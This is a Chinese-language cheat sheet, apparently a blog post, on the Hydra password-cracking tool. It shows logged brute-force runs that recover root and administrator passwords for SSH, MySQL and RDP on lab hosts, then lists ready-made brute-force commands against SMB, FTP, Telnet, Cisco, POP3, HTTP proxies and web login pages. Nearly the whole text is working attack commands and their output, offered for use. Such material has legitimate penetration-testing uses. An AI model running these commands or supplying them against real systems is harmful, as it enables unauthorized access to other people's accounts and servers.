Hydra使用

常用实例：

SSH暴力破解
e2a5e@kali:~$ hydra -L /data/dic/user.dic -P /data/dic/password.dic -t 5 192.168.2.235 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-27 09:08:41
[DATA] max 5 tasks per 1 server, overall 5 tasks, 10 login tries (l:2/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.2.235:22/
[22][ssh] host: 192.168.2.235 login: root password: HDXY123!@#
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-08-27 09:08:46

mysql暴力破解
e2a5e@kali:~$ hydra -L /data/dic/user.dic -P /data/dic/password.dic -t 5 192.168.2.235 mysql
Hydra v9.0 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-27 09:07:25
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 8 login tries (l:2/p:4), ~2 tries per task
[DATA] attacking mysql://192.168.2.235:3306/
[3306][mysql] host: 192.168.2.235 login: root password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-08-27 09:07:26

远程桌面暴力破解
e2a5e@kali:~$ hydra -L /data/dic/user.dic -P /data/dic/password.dic -t 1 192.168.2.57 rdp
Hydra v9.0 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-27 09:12:10
[WARNING] the rdp module is experimental. Please test, report – and if possible, fix.
[DATA] max 1 task per 1 server, overall 1 task, 15 login tries (l:3/p:5), ~15 tries per task
[DATA] attacking rdp://192.168.2.57:3389/
[3389][rdp] host: 192.168.2.57 login: administrator password: HDXY123!@#
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-08-27 09:12:11

其他常用破解命令

使用hydra破解ssh的密码
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

破解https：
hydra -m /index.php -l username -P pass.txt IP https

破解teamspeak：
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

破解cisco：
hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解smb：
hydra -l administrator -P pass.txt IP smb

破解pop3：
hydra -l muts -P pass.txt my.pop3.mail pop3

破解rdp：
hydra IP rdp -l administrator -P pass.txt -V

破解http-proxy：
hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解telnet
hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

破解ftp：
hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV

<

p class=”p” align=”justify” style=”margin: 7.5pt 0pt 7.5pt 22.5pt;text-indent: 0pt;padding: 0pt;text-align: justify;background-image: initial;background-position: initial;background-size: initial;background-attachment: initial”>get方式提交，破解web登录：
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php